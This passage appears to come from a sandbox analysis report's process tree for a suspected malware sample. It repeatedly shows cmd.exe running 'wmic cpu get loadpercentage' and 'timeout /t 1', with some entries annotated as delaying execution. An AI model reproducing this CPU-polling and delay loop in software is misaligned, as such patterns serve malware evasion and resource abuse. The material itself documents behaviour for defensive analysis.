  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2144
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4028
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:64
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:304
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2580
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3168
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3684
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2204
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1244
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4484
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4504
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2560
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2788
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4792
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4832
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
